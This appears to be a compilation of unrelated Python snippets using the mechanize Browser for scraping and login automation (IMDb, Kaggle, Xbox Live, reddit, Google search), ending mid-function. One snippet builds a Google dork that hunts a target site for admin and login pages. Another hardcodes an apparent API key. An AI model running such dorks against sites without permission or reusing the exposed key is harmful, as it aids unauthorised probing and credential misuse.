def main():

    parser = argparse.ArgumentParser()

    parser.add_argument('--total-jobs', metavar='<total-jobs>', help='total number of jobs downloading documents', type=int)
    parser.add_argument('--job', metavar='<job>', help='job number between 1 and <total-jobs>', type=int)

    args = parser.parse_args()
    check_args(parser, args)

    br = Browser()
    br.set_handle_robots(False)
#    br.set_debug_responses(True)

    data = urlencode({'user': USERNAME, 'pass': getpass()})

    document_urls = [LOGIN_PREFIX + url.strip() + '&view=etext' for url in file(DOCUMENT_URLS_FILE)]

    start = args.job - 1
    step = args.total_jobs

    for url in iterview(document_urls[start::step]):
        try:
            get_document_pages(br, url, data)
        except Exception as e:
            print >> sys.stderr, '\n', (url, e)
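The check_args helper called above is not shown anywhere in the snippet; a minimal sketch of what it presumably does, assuming it only validates the --job/--total-jobs pair set up by argparse:

def check_args(parser, args):
    # Sketch (assumption): require both arguments and keep --job in range.
    if args.total_jobs is None or args.job is None:
        parser.error('both --total-jobs and --job are required')
    if not 1 <= args.job <= args.total_jobs:
        parser.error('--job must be between 1 and <total-jobs>')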
 def getScramArchByCMSSW(self):
     """
     From the list of available CMSSW releases, return a dictionary
     of ScramArch by CMSSW release.
     """
     
     # Open a temporary connection to the server and get the ReleasesXML response from cmstags
     url = 'https://cmssdt.cern.ch/SDT/cgi-bin/ReleasesXML'
     br = Browser()
     br.set_handle_robots(False)
     response=br.open(url)
     soup = BeautifulSoup(response.read())
     
     # Dictionary form
     # {'CMSSW_X_X_X':[slc5_amd64_gcc472], ... }
     archByCmssw={}
     
     # Fill the dictionary
     for arch in soup.find_all('architecture'): 
         for cmssw in arch.find_all('project'): 
             # CMSSW release
             cmsswLabel = cmssw.get('label').encode('ascii', 'ignore')
             if cmsswLabel not in archByCmssw:
                 archByCmssw[cmsswLabel]=[]
             # ScramArch related to this CMSSW release
             archName = arch.get('name').encode('ascii', 'ignore')
             archByCmssw[cmsswLabel].append(archName)
     
     return archByCmssw
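Since the method returns a plain dict, callers can look up the ScramArchs for a release directly. A hypothetical usage; the owning class is not shown, so tag_collector is an assumed instance name and the release label is only illustrative:

arch_map = tag_collector.getScramArchByCMSSW()
for arch in arch_map.get('CMSSW_7_4_0', []):
    print(arch)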
Example #3
class GetPIN():
    def __init__(self,url,username, password):
        self.br = Browser()
        self.br.set_handle_equiv(False)
        self.br.set_handle_robots(False)
        self.url = url
        self.username = username
        self.password = password
 
    def getPIN(self):
        self.br.open(self.url)
        try:
            self.br.select_form(name="authZForm")
            self.br['userId'] = self.username
            self.br['passwd'] = self.password
            response = self.br.submit()
            data = response.readlines()
        except:
            data = self.br.response().readlines()
        pattern = r'<span class="fb">(.*?)</span>' 
        pat = re.compile(pattern)
        for line in data:
            if pat.search(line):
                verifier = pat.findall(line)
                break
        if len(verifier):
            return verifier[0]
        else:
            return -1
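A hypothetical use of the GetPIN class above; the authorization URL and credentials are placeholders, and getPIN() returns -1 when no PIN could be scraped:

fetcher = GetPIN('https://example.com/oauth/authorize', 'someuser', 'secret')
pin = fetcher.getPIN()
if pin != -1:
    print(pin)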
Example #4
 def __init__(self):
     Browser.__init__(self)
     self.set_handle_robots(False)
     self.addheaders = [(
         'Accept',
         'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
     )]
Example #5
    def on_task_start(self, task, config):
        try:
            from mechanize import Browser
        except ImportError:
            raise PluginError('mechanize required (python module), please install it.', log)

        userfield = config.get('userfield', 'username')
        passfield = config.get('passfield', 'password')

        url = config['url']
        username = config['username']
        password = config['password']

        br = Browser()
        br.set_handle_robots(False)
        try:
            br.open(url)
        except Exception as e:
            # TODO: improve error handling
            raise PluginError('Unable to post login form', log)

        #br.set_debug_redirects(True)
        #br.set_debug_responses(True)
        #br.set_debug_http(True)

        for form in br.forms():
            loginform = form

            try:
                loginform[userfield] = username
                loginform[passfield] = password
                break
            except Exception as e:
                pass
        else:
            received = os.path.join(task.manager.config_base, 'received')
            if not os.path.isdir(received):
                os.mkdir(received)
            filename = os.path.join(received, '%s.formlogin.html' % task.name)
            with open(filename, 'w') as f:
                f.write(br.response().get_data())
            log.critical('I have saved the login page content to %s for you to view' % filename)
            raise PluginError('Unable to find login fields', log)

        br.form = loginform

        br.submit()

        cookiejar = br._ua_handlers["_cookies"].cookiejar

        # Add cookiejar to our requests session
        task.requests.add_cookiejar(cookiejar)
        # Add handler to urllib2 default opener for backwards compatibility
        handler = urllib2.HTTPCookieProcessor(cookiejar)
        if urllib2._opener:
            log.debug('Adding HTTPCookieProcessor to default opener')
            urllib2._opener.add_handler(handler)
        else:
            log.debug('Creating new opener and installing it')
            urllib2.install_opener(urllib2.build_opener(handler))
def url_handler(data, lock):
    tweet = json.loads(data)
    if tweet['entities']['urls']:
        for index in range(len(tweet['entities']['urls'])):
            url = tweet['entities']['urls'][index]['expanded_url']
            try:
                tweet['entities']['urls'][index]['url_title'] = "-"
                br = Browser()
                br.open(url)
                title = br.title()
                if title == None:
                    title = "-"
                tweet['entities']['urls'][index]['url_title'] = title.encode('ascii','ignore')
            
            except (BrowserStateError, ParseError, UnicodeDecodeError, URLError):
                pass
    else:
        pass  # no URLs in this tweet; write it out unchanged
    lock.acquire()
    try:    
        try:
            global count
            f = open('json/tweets-' + str(count) + '.json', 'a')
            if f.tell() >= 9900000:
                f.close()
                count += 1
                f = open('json/tweets-' + str(count) + '.json', 'a')
            f.write(json.dumps(tweet) + "\n")
            f.close()
        except UnicodeDecodeError, e: 
            pass
    finally:
        lock.release()
Example #7
 def down_image(self, img):
     print "down image from " + img
     down_br = Browser()
     down_cj = CookieJar()
     down_br.set_cookiejar(down_cj)
     fn = tempfile.mktemp(suffix='.png')
     return down_br.retrieve(img, filename = fn)[0]
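down_image returns the temporary filename that mechanize's retrieve() wrote to disk. A hypothetical caller; the image URL is illustrative and scraper stands in for an instance of the unshown class:

path = scraper.down_image('http://example.com/captcha.png')
with open(path, 'rb') as f:
    raw = f.read()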
Example #8
def respond(bot, event):
    matches = []
    for (ident, (regex, template)) in bot.commands_cache.iteritems():
        match = regex.search(event.message)
        if match:
            params = match.groupdict()
            params['nick'] = event.source
            heappush(
                matches, (match.start(0), template.safe_substitute(params))
            )

    if not matches:
        if event.message.find("http") != -1:
            br = Browser()
            try:
                br.set_handle_robots(False)
                br.open(event.message)
                bot.send_channel_action(bot.config.messages.urltitle, title = format.bold('\"' + br.title() + '\"'))
            except:
                return False
            return True
        else:
            return False

    bot.send_channel_action(matches[0][1])
    return True
Example #9
  def GetXboxLiveFriends(self):
    """Return a list of tuples (gamer_tag, gamer_presence)."""
    br = Browser()
    br.open('http://live.xbox.com/en-US/profile/Friends.aspx')
    br.select_form(name='f1')
    br['login'] = self.login
    br['passwd'] = self.passwd
    br.submit()  # Submit login form.
    br.select_form(name='fmHF')
    response = br.submit()  # Submit redirect form.
    friend_list = response.read()
    response.close()

    soup = BeautifulSoup(friend_list)
    friend_table = soup.find('table', {'class': FRIEND_TABLE_CLASS})
    if friend_table is None:
      raise XboxLiveError('Parsing failure.')

    friends = []
    for row in friend_table.contents[1:]:  # Skip header row.
      gamer_tag = row.find('td', {'class': GAMER_TAG_CLASS})
      gamer_tag = str(gamer_tag.find('a').contents[0])
      gamer_presence = row.find('td', {'class': GAMER_PRESENCE_CLASS})
      gamer_presence = str(gamer_presence.find('h4').contents[0])
      friends.append((gamer_tag, gamer_presence))
    return friends
Example #10
def KILLMODE():
    global FIRE, cdown
    if (FIRE):
        cdown = cdown + 1
        global urlList, urlBList, Stats, stats
        # generate random ytube link
        x = ''.join([random.choice(string.ascii_letters + string.digits + "_-") for n in xrange(11)])
        while x in urlList or x in urlBList:
            print "Generated Duplicate Link; Re-generating"
            x = ''.join([random.choice(string.ascii_letters + string.digits + "_-") for n in xrange(11)])
        br = Browser()
        try:
            res = br.open("http://www.youtube.com/watch?v=" + x)
            data = res.get_data() 
            soup = BeautifulSoup(data)
            title = soup.find('title')
            # dead links are titled just 'YouTube'; anything else is a real video
            if title.renderContents() != "YouTube":
                urlList.append("http://www.youtube.com/watch?v=" + x)
            # links titled 'YouTube' go to the bad-link list
            else:
                urlBList.append("http://www.youtube.com/watch?v=" + x)

        except HTTPError, e:
            print "Error ", e.code
            print "ERROR at:: http://www.youtube.com/watch?v=" + x

        Stats.set("TRIES THIS ATTEMPT: " + str(cdown) + "\nSUCCESS: " + str(len(urlList)) + "\nFAIL: " + str(len(urlBList)))
Example #11
    def login_to_kaggle(self):  
        """ Login to Kaggle website
        Parameters:
        -----------
        None
        
        Returns:
        browser: Browser
            a mechanizer Browser object to be used for further access to site
        """          
        
        if self.verbose:
            print("Logging in to Kaggle..."),

        br = Browser()
        cj = cookielib.LWPCookieJar()
        br.set_cookiejar(cj)
        
        br.open(self.kag_login_url)
        
        br.select_form(nr=0)
        br['UserName'] = self.kag_username
        br['Password'] = self.kag_password
        br.submit(nr=0)
        
        if br.title() == "Login | Kaggle":
            raise KaggleError("Unable to login Kaggle with username %s (response title: %s)" % (self.kag_username,br.title()))
        
        if self.verbose:
            print("done!")
        
        return br
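A hypothetical follow-up using the Browser returned by login_to_kaggle(); client stands in for an instance of the unshown class and the data URL is only illustrative:

br = client.login_to_kaggle()
resp = br.open('https://www.kaggle.com/c/titanic/data')  # illustrative URL
html = resp.read()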
Example #12
def google(query):
    print("\n\t[!] Searching on Google...\n")
    print("[QUERY] >> " + query)

    try:
        query = query.replace(" ", "+")
        req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query
        br = Browser()
        br.set_handle_robots(False)
        br.addheaders = [("User-agent", "chrome")]
        html = br.open(req).read()
        soup = BeautifulSoup(html, "html5lib")

        with open("./output/google-%s.txt" % query[8:], "w") as log:
            for results in soup.findAll(attrs={"class": "g"}):
                for title in results.findAll("h3", attrs={"class": "r"}):
                    t = title.text
                    t = t.title()
                    for link in results.findAll(attrs={"class": "s"}):
                        l = link.cite.text
                        print(t)
                        print(l + '\n')
                        log.write(str(l) + '\n')

    except Exception as e:
        print(e)
def fetch_laws_page_from_year(year, temporaryDirectory):  
    lawsDirectory = os.path.join(temporaryDirectory, 'all_laws');
    if not os.path.exists(lawsDirectory):
        os.makedirs(lawsDirectory)
        print('The laws directory did not exist so I created it')
        print(lawsDirectory)

    fileToWriteLawsListIn = os.path.join(lawsDirectory, year + '.html')
    print('File to write in is ' + fileToWriteLawsListIn)
    lawWasNotDownloaded = not os.path.isfile(fileToWriteLawsListIn)
    if lawWasNotDownloaded:
        startDownload = int(round(time.time() * 1000))
        
        print('Getting laws from year ' + year)
        url = get_ugly_url_for_laws(year)
        browser = Browser()
        browser.open(url)
        html = browser.response().get_data()

        with open(fileToWriteLawsListIn, 'a') as f: 
            f.write (html)

        endDownload = int(round(time.time() * 1000))
        print('Finished downloading laws for year ' + year + '. It took only ' 
              + str(endDownload - startDownload) + ' milliseconds')
    else:
        print('This year was already fetched ' + year 
              + '. Skipping to the next year')
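A hypothetical driver loop for the function above; the year range and target directory are assumptions, and the years are passed as strings because the function concatenates them into file names and log messages:

for year in range(2000, 2016):
    fetch_laws_page_from_year(str(year), '/tmp/law_scrape')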
Example #14
    def __init__(self, request, username,password,context=''):
        """
        On instantiation, the class logs in using the supplied username and password.
        If browser_login holds anything, it is the set of cookies saved from the last logged-in session;
        reloading those cookies into a new Browser saves the few seconds a full login would take.
        """
        self.context=context
        self.request=request
        registry = self.request.registry
        self.epitool=registry.getUtility(IEPIUtility)

        self.username = username
        self.password = password
        self.browser_login, elk = self.epitool.recoverBrowserSession(self.request, self.username,'presencia')
        if self.browser_login:
          self.br=Browser()
          self.br.set_handle_robots(False)
          cj = LWPCookieJar()
          self.br.set_cookiejar(cj)
          for co in self.browser_login:
              ck = Cookie(version=co['version'], name=co['name'], value=co['value'], port=co['port'], port_specified=co['port_specified'], domain=co['domain'], domain_specified=co['domain_specified'], domain_initial_dot=co['domain_initial_dot'], path=co['path'], path_specified=co['path_specified'], secure=co['secure'], expires=co['expires'], discard=co['discard'], comment=co['comment'], comment_url=co['comment_url'], rest=co['rest'])
              cj.set_cookie(ck)
          print "Logging-in into presencia via browser"
        else:
          self.br = Browser()
          self.br.set_handle_equiv(False)
          self.login(message=u"Logging-in into presencia via regular login")
          return
Example #15
 def newBrowser(self):
   # Create new browsers all the time because its data structures grow
   # unboundedly (texas#135)
   br = Browser()
   br.add_password(self.hostname, self.username, self.password)
   br.set_handle_robots(None)
   return br
Example #16
 def num_itens(self,busca, data_inicial, data_final):
     
     try:
         br = Browser()
         
         self.endereco = 'http://www.imprensaoficial.com.br/PortalIO/DO/BuscaDO2001Resultado_11_3.aspx?f=xhitlist&xhitlist_sel=title%3bField%3adc%3atamanho%3bField%3adc%3adatapubl%3bField%3adc%3acaderno%3bitem-bookmark%3bhit-context&xhitlist_vpc=first&xhitlist_s=&xhitlist_q=('\
                     +busca+\
                     ')&filtrotodoscadernos=True&xhitlist_xsl=xhitlist.xsl&filtrocadernossalvar=todos%2cexeci%2cjucii%2casb%2cexecii%2cjudciii%2cjc%2ctrt2r%2cjudel%2cjudipi%2cjudipii%2ctrt15r%2cemp%2csup%2cdouj%2cdom%2ctjm%2ctre%2ctrt2aa%2cjfd%2coab&xhitlist_mh=9999&filtropalavraschave='\
                     +busca
                     
         response1 = br.open(self.endereco)
         
         texto = response1.read()
 
         x1, x2, x3 = texto.partition('<span id="lblDocumentosEncontrados" class="tx_red">')
         x3, x2, x1 = x3.partition("</span></td>")
                     
         x3 = x3.replace(",","")
         x3 = x3.strip()
         # Returns the number of items found
         if x3 == "Um":
             return 1
     except:
         print("Erro no endereço!")
         print(self.endereco)
         x3 = "0"
     
     if len(x3) > 0:
         return int(x3)
     else:
         return 0
Example #17
    def submit(self, timestamp, username, password, t_id, t_short, files, language):
        """Execute the request for a submission.

        timestamp (int): seconds from the start.
        username (string): username issuing the submission.
        password (string): password of username.
        t_id (string): id of the task.
        t_short (string): short name of the task.
        files ([dict]): list of dictionaries with keys 'filename' and
                        'digest'.
        language (string): the extension the files should have.

        """
        logger.info("%s - Submitting for %s on task %s." % (to_time(timestamp), username, t_short))
        if len(files) != 1:
            logger.error("We cannot submit more than one file.")
            return

        # Copying submission files into a temporary directory with the
        # correct name. Otherwise, SubmissionRequest does not know how
        # to interpret the file (and which language they are in).
        temp_dir = tempfile.mkdtemp(dir=config.temp_dir)
        for file_ in files:
            temp_filename = os.path.join(temp_dir, file_["filename"].replace("%l", language))
            shutil.copy(os.path.join(self.import_source, "files", files[0]["digest"]), temp_filename)
            file_["filename"] = temp_filename

        filename = os.path.join(files[0]["filename"])
        browser = Browser()
        browser.set_handle_robots(False)
        step(LoginRequest(browser, username, password, base_url=self.cws_address))
        step(SubmitRequest(browser, (int(t_id), t_short), filename=filename, base_url=self.cws_address))
        shutil.rmtree(temp_dir)
Example #18
class Du8Doc:

    def __init__(self):
        self.br = Browser()
        
    def from_html(self, html):
        text = re.sub("<.+>\n", "", html)
        text = re.sub("</.+>\n", "", text)
        text = re.sub('(<br/?>\s*)+', '\n', text)
        text = re.sub('&nbsp;', ' ', text)
        return text

    def get_links(self, url):
        res = self.br.open(url)
        data = res.get_data() 
        soup = BeautifulSoup(data, "html5lib")
        div_content = soup.find('table')
        urls = div_content.find_all("a")
        return [url.get('href') for url in urls ]        
        
    def get_content(self, link):
        res = self.br.open(link)
        data = res.get_data() 
        soup = BeautifulSoup(data, "html5lib")
        title, chapter = soup.html.title.string.split("-")[0:2]
        div_content = soup.find(id="content").prettify()
        content = self.from_html(div_content)
        return title, chapter, content
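A hypothetical way to chain the two methods of Du8Doc; the index URL is purely illustrative:

doc = Du8Doc()
for href in doc.get_links('http://www.example.com/book/index.html'):
    title, chapter, content = doc.get_content(href)
    print('%s - %s' % (title, chapter))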
Example #19
	def google(self):
		print("\n\t[!] Searching on Google...\n")

		if self.dork == None:
			query = "site:" + self.target.replace("http://", "").replace("https://", "") + " inurl:(login||adm||admin||admin/account||controlpanel||adminitem||adminitems||administrator||administration||admin_area||manager||letmein||superuser||access||sysadm||superman||supervisor||control||member||members||user||cp||uvpanel||manage||management||signin||log-in||log_in||sign_in||sign-in||users||account)"
		else:
			query = "".join(self.dork)
			query = query.strip("'")

		print("[DORK] >> " + query)

		try:
			query = query.replace(" ", "+")
			req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query
			br = Browser()
			br.set_handle_robots(False)
			br.addheaders = [("User-agent", "chrome")]
			html = br.open(req).read() 
			soup = BeautifulSoup(html, "html5lib")

			with open("./output/google-%s.txt" % self.target[8:], "w") as log:
				for results in soup.findAll(attrs={"class":"g"}):
					for title in results.findAll("h3", attrs={"class":"r"}):
						t = title.text
						t = t.title()
					for link in results.findAll(attrs={"class":"s"}):
						l = link.cite.text
						print (t)
						print (l + '\n')
						log.write(str(l) + '\n')
		
		except Exception as e:
			print(e)
Example #20
def name(request, string):

    movie = string.replace("_", "+")
    br = Browser()
    br.open("http://www.imdb.com/find?s=tt&q="+movie)
    link = br.find_link(url_regex=re.compile(r"/title/tt.*"))
    data = br.follow_link(link)
    soup = BeautifulSoup(data.read())

    title = soup.find('h1').contents[0].strip()
    name = title.replace("&nbsp;", "")
    rating = soup.find('span', itemprop='ratingValue').contents[0]
    duration = soup.find('time', itemprop='duration').contents[0].strip()
    releaseDate = soup.find('a', title='See more release dates').contents[0]
    director = soup.find('span', itemprop='director').getText()
    actor_all = []
    actors = soup.findAll('span', itemprop='actors')
    for i in range(len(actors)):
        actor_all.append((actors[i].contents[1]).getText())
    genres_all = []
    genres = soup.findAll('span', itemprop='genre')
    for i in range(len(genres)):
        genres_all.append(genres[i].getText())

    jsonObject = {}
    jsonObject['Name:'] = name
    jsonObject['IMDB Rating:'] = rating
    jsonObject['Duration'] = duration
    jsonObject["Actors: "] = actor_all
    jsonObject['Director:'] = director
    jsonObject['Genres'] = genres_all
    jsonObject['Release Date'] = releaseDate
    movie_details = json.dumps(jsonObject)
    return HttpResponse(movie_details)
Example #21
 def parseFeeds(self):
     mech = Browser()
     mech.addheaders = [ ('User-agent', 'Mozilla/5.0 (compatible)') ]
     mech.set_handle_robots(False)
     for url in self.feedUrls:
     #url = "http://feeds.feedburner.com/PurdueEngNews?format=xml"
         page = mech.open(url)
         html = page.read()
         soup = BeautifulStoneSoup(html)
         headlines = []
         descriptions = []
         i=0
         self.newsList = []
         for item in soup.findAll('item'):
             if (i > 20):
                 break
             date = item.find('pubdate')
             title = item.find('title')
             link = item.find('link')
             desc = item.find('description')
             if (len(title.contents) > 0):
                 title2 = title.contents[0]
             else:
                 title2 = 'None'
             self.newsList.append(NewsStory(date.contents[0], title2, link.contents[0], \
                 desc.contents[0]))
             i+=1
         for story in self.newsList:
             headlines.append(story.title)
             descriptions.append(story.link)
             #story.display()
         self.headlineList.append(headlines)
         self.descList.append(descriptions)
     self.populateTopicList()
    def getLastEntries(self, url, lastDate):
        """ get all entries from an HTML table list if it is newer 
        than prevEntry. Format is from graz FF site """

        mech = Browser()
        mech.set_handle_robots(False)
        try:
            page = mech.open(url)
        except urllib2.HTTPError:
            if url == None:
                url = "(empty url)"
            self.logger.error("Could not read url "+url)
            return []
        html = page.read()
        soup = BeautifulSoup(html)
        link = soup.findAll('a')
        if len(link) == 0:
            self.logger.error('No links in the page: %s', url)
            return []
        returnLinks = []

        for l in link:
            try:
                date = datetime.strptime(l.string, "topo-%Y-%m-%d-%H:%M.tsv.gz")
            except ValueError:
                continue
            if date > lastDate:
                returnLinks.append(url+l.string)
            else:
                break

        return returnLinks
Example #23
def mrsc(gid):
	mech = Browser()
	url = "http://espn.go.com/ncf/playbyplay?gameId="+gid+"&period=0"
	#print url
	page = mech.open(url)
	html = page.read()
	print url
	if html.count('Play-by-play not currently available.') == 0:
		soup = BeautifulSoup(html)
		table = soup.findAll("table")[-1]
		rows = table.findAll('tr')[::-1]
		c=0
		toret=''
		keepgoing=True
		cup=html[::-1][:html[::-1].find(' left; font: 700 14px/25px Helvetica,Arial,sans-serif;" colspan="3"><div style="margin-right: 6px;"'[::-1])][::-1]
		cup=cup[cup.find('a name="')+len('a name="'):]
		cup=cup[:cup.find('"')]
		while c < 7 and keepgoing and c < len(rows):
			cols = rows[c].findAll('td')
			#print rows[c]
			if len(cols) > 2:
				#if str(cols[2]) != '<td>&nbsp;</td>' and str(cols[3]) != '<td>&nbsp;</td>':
				toret=str(' '.join(cols[0].findAll(text=True)))+'. '+str(' '.join(cols[1].findAll(text=True)))
				keepgoing=False
			c=c+1
		toret=toret.replace('  ',' ').strip()
		if toret != '': toret=toret+' '
		poss=''
		if cup != '' and len(cup) < 30: poss=cup
	else:
		toret=''
		poss=''
	return [toret,poss]
Example #24
    def num_itens(self,busca, data_inicial, data_final):
        br = Browser()
        response1 = \
            br.open("http://portal.in.gov.br/in/imprensa1/pesquisa_avancada")
        br.select_form(name="formBusca")
        br["texto_todas"] = busca
        br["dataPublicacaoInicial"] = data_inicial[:5]
        br["dataPublicacaoFinal"] = data_final[:5]
        br["ano"] = [data_final[-4:]]
        br["idJornal"] = ["1", "2", "3", "4"]
#        print(br.form)
        br.form.action = \
            "http://www.in.gov.br/imprensa/pesquisa/pesquisaresultado.jsp"
        res = br.submit()
        texto = res.read()
        x1, x2, x3 = texto.partition("ite")
        x1, x2, x3 = x1.rpartition(">")
        
        try:
            arq = open(self.retornar_html(),"w")
            arq.write(texto)
            arq.close()
        except:
            print("Erro ao tentar salvar página de buscas!")
        
        x3 = x3.replace(",","")
        x3 = x3.strip()
        # Returns the number of items found
        if x3 == "Um":
            return 1
        
        if len(x3) > 0:
            return int(x3)
        else:
            return 0
Example #25
def scrap_query(query, bang=None):

    r = ddg_query('imbd ' + query, bang=bang)
    if 'redirect' in dir(r) and 'primary' in dir(r.redirect):
        url = r.redirect.primary
    else:
        logger.info('Could not find imdb searchpage from DuckDuckGo bang')
        return None

    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 6.2;\
                        WOW64) AppleWebKit/537.11 (KHTML, like Gecko)\
                        Chrome/23.0.1271.97 Safari/537.11')]

    r = br.open(url)
    soup = BeautifulSoup(r)


    for link in soup.find_all('a'):
        href = link.get('href','')
        match = re.search(r"imdb\.com/.*tt(?P<number>[^/]*)", href)
        if match:
            imdb_id = check_imdb(match.group('number'))
            return imdb_id

    return None
Example #26
def gen_path(request):
    x = json.loads(request.POST['data'])    #fetches data
    print x
    adj_mat = []    #creates empty adjacency matrix
    i1 = j1 = 0
    num_cities = len(x)
    for i in x:
        tmp_mat = []
        for j in x:
            if i!=j:
                API_KEY = "AIzaSyDBOSr6_XxvISPGX54P9bPnooE3RUpRTp0"
                orig_coord = x[i]
                dest_coord = x[j]
                br = Browser()  #creates mechanize instance
                br.set_handle_robots(False)
                # print "https://maps.googleapis.com/maps/api/distancematrix/json?origins={0}&destinations={1}&key={2}".format(orig_coord, dest_coord, API_KEY)
                result = br.open("https://maps.googleapis.com/maps/api/distancematrix/json?origins={0}&destinations={1}&key={2}".format(orig_coord, dest_coord, API_KEY)).read()    #makes a call to GoogleMapsAPI
                json_result = json.loads(result)
                tmp_mat.append(int(json_result['rows'][0]['elements'][0]['distance']['value']))
            else:
                tmp_mat.append(0)
        adj_mat.append(tmp_mat)



    obj = ArpanDaErCode()
    ans = ""
    ans = ArpanDaErCode.solve(obj, adj_mat, num_cities) #gets sequence from model
    print ans
    ret = {'data': [str(ii) for ii in ans]}

    return HttpResponse(str(json.dumps(ret)))   #returns the sequens in JSON format for the JS to handle
    def __init__(self,options):
        (self.configfile,self.config,self.moduleconfig) = self.initialize_config(options)
        # If we have a particular log level for this module, use that,
        # otherwise use the global log level. If that isn't defined
        # either, use the INFO loglevel.
        if 'log' in self.moduleconfig:
            loglevel = self.moduleconfig['log']
        else:
            loglevel = self.config.get('log','INFO')
        self.log = self.setup_logger(self.module_dir,loglevel)

        self.base_dir = self.config['datadir']

        if self.browser_use_robustfactory:
            self.browser = Browser(factory=RobustFactory())
        else:
            self.browser = Browser()
        self.browser.addheaders = [('User-agent', 'lagen.nu-bot ([email protected])')]

        # logger = logging.getLogger("mechanize")
        # logger.addHandler(logging.StreamHandler(sys.stdout))
        # logger.setLevel(logging.DEBUG)
        # self.browser.set_debug_http(True)
        # self.browser.set_debug_responses(True)
        # self.browser.set_debug_redirects(True)


        self.ns = {'rinfo':  Namespace(Util.ns['rinfo']),
                   'rinfoex':Namespace(Util.ns['rinfoex']),
                   'dct':    Namespace(Util.ns['dct'])}
Example #28
def lookup_offers_isbn(item_id):
    offers = []
    br = Browser()
    res = br.open("http://books.half.ebay.com/ws/web/HalfISBNSearch?isbn=%s" % item_id)
    soup = BeautifulSoup(res.read())
    ratings = soup.findAll('span',{'class': 'Header'})
    for r in ratings:
        rating = r.text
        prices= r.parent.parent.parent.findNextSibling('table').findAll('tr')[1:]
        linktext  = r.parent.parent.parent.findNextSiblings('table')[1].find(text=re.compile('View all.*'))
        if linktext:
            all = linktext.parent['href']
            # get link
            res2 = br.open(all)
            soup = BeautifulSoup(res2.read())
            rating2 = soup.findAll('span',{'class': 'Header'})
            prices = rating2[0].parent.parent.parent.parent.findAll('table')[3].findAll('tr')[1:]
        for row in prices:
            m = re.search("itemid=(\d+)",row.find('a',href=re.compile("itemid=\d+"))['href'])
            itemid=m.group(1)
            seller = row.find('a',{'class':'SellerDisplayLink'}).text
            price = row.find('span',{'class':'ItemPrice'}).text
            price = string.replace(price,",","")
            if price.startswith("$"):
                price = price[1:]
            offers.append({ 'rating' : rating, 'seller' : seller, 'listing_id' : itemid, 'price' : str(price) })
            print rating,seller,itemid,price
    return offers
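A hypothetical call to lookup_offers_isbn(); the ISBN is illustrative and each returned dict carries the keys built in the loop above:

for offer in lookup_offers_isbn('9780262033848'):
    print('%s %s %s' % (offer['rating'], offer['seller'], offer['price']))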
def respond(permalink, text):
    br = Browser()
    user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1'
    br.addheaders = [('User-agent', user_agent)]

    soup = BeautifulSoup(br.open(permalink).read())

    urlopen = urllib2.urlopen
    Request = urllib2.Request
    encode = urllib.urlencode
    cj = cookielib.LWPCookieJar()

    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)

    root_comment = soup.find('form', attrs={'class': 'usertext border'})
    thing_id = root_comment.find('input', attrs={'name': 'thing_id'})['value']
    print 'thing_id', thing_id

    # LOG THE F**K IN
    req = Request('http://www.reddit.com/api/login/username', encode({'user': '******', 'passwd': 'hackny', 'api_type': 'json'}), {'User-Agent': user_agent})
    req_open = urlopen(req)
    read = json.loads(req_open.read())

    modhash = read['json']['data']['modhash']

    # POST THE F*****G COMMENT
    req = Request('http://www.reddit.com/api/comment', encode({'thing_id': thing_id, 'text': text + '\n\n*This is an automated response.*', 'uh': modhash}), {'User-Agent': user_agent})
    req_open = urlopen(req)
    read = json.dumps(req_open.read())
Example #30
def login_url(
                url,
                login,
                passwd,
                form_nomber,
                login_name,
                paswd_name,
                submit_nomber
            ):
    br = Browser(); showMessage('Создаю интерфейс браузера')
    cj = cookielib.LWPCookieJar()
    br.set_cookiejar(cj)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

    br.open(url); showMessage('Загружаю сайт и произвожу вход')
    br.select_form(nr = form_nomber)
    br[login_name] = login
    br[paswd_name] = passwd

    res = br.submit(nr = submit_nomber)
    content = res.read()
    # determine the number of pages
    maxPage = int(max_page(content)); showMessage('Определяю количество страниц и перехожу на последнюю')
    curPage = 84
    while curPage < maxPage:
        res = br.open('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage))
        curPage = maxPage
        maxPage = int(max_page(content))
        content = res.read()
    # parse the keys
    if get_all_keys(content):
        webbrowser.open_new_tab('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage)) # returns True and opens a new tab
Example #31
 def set_debug_redirect(self, *args, **kwargs):
     B.set_debug_redirect(self, *args, **kwargs)
     self._clone_actions['set_debug_redirect'] = ('set_debug_redirect',
             args, kwargs)
Example #32
 def set_handle_equiv(self, *args, **kwargs):
     B.set_handle_equiv(self, *args, **kwargs)
     self._clone_actions['set_handle_equiv'] = ('set_handle_equiv',
             args, kwargs)
Example #33
 def set_handle_refresh(self, *args, **kwargs):
     B.set_handle_refresh(self, *args, **kwargs)
     self._clone_actions['set_handle_refresh'] = ('set_handle_refresh',
             args, kwargs)
Example #34
 def set_handle_gzip(self, handle):
     B._set_handler(self, '_gzip', handle)
     self._clone_actions['set_handle_gzip'] = ('set_handle_gzip',
             (handle,), {})
Example #35
class BetFair():
    def __init__(self, url, filename, sample_time, n_attempts=2):
        self.filename = filename
        self.sample_time = sample_time
        self.n_attempts = n_attempts
        sleep_time = 5
        self.url = url
        self.br = Browser()

        while (True):
            attempt = 0
            for attempt in range(n_attempts):
                try:
                    self._load_page()
                    self.write_games_odds()
                    break
                except:
                    print('Erro!')
                    time.sleep(sleep_time)

            time.sleep(self.sample_time - attempt * sleep_time)

    def _load_page(self):
        self.time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        page_content = self.br.open(self.url).read()
        page = BeautifulSoup(page_content, "lxml")
        page = page.find_all('div', class_='content-multipick')
        self.page = page[0].find_all('div',
                                     class_='details-market market-3-runners')

    def _get_games_odds(self, pg):

        # TODO: get rid of this ugly slicing
        start = str(pg.find_all('a')[0]).find('data-galabel')
        end = str(pg.find_all('a')[0]).find('data-loader')
        teams = str(pg.find_all('a')[0])[start + 14:end - 11].split(' x ')
        team1 = teams[0]
